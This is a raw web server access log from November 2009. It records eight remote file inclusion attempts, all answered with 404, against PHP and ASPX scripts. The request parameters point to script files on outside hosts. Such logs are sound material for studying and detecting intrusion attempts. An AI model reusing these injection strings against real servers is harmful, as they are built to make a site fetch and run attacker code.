141.223.60.4 - - [01/Nov/2009:21:50:07 -0800] "GET /logs///standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [01/Nov/2009:21:50:10 -0800] "GET /logs/access_091012.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [01/Nov/2009:21:50:29 -0800] "GET /logs/access_091012.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.136.177.137 - - [01/Nov/2009:21:50:46 -0800] "GET /logs/access_090504.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.hotlinkfiles.com/files/2428440_iga95/id-1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.199.140.158 - - [01/Nov/2009:21:51:01 -0800] "GET /logs/access_090810.log//members/upload.aspx?path=http://www.kagul.ru/2/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:21:51:35 -0800] "GET /logs///skin/dognara_gallery/setup.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:21:51:35 -0800] "GET //skin/dognara_gallery/setup.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [01/Nov/2009:21:51:35 -0800] "GET /logs/access.log%20%20///skin/dognara_gallery/setup.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
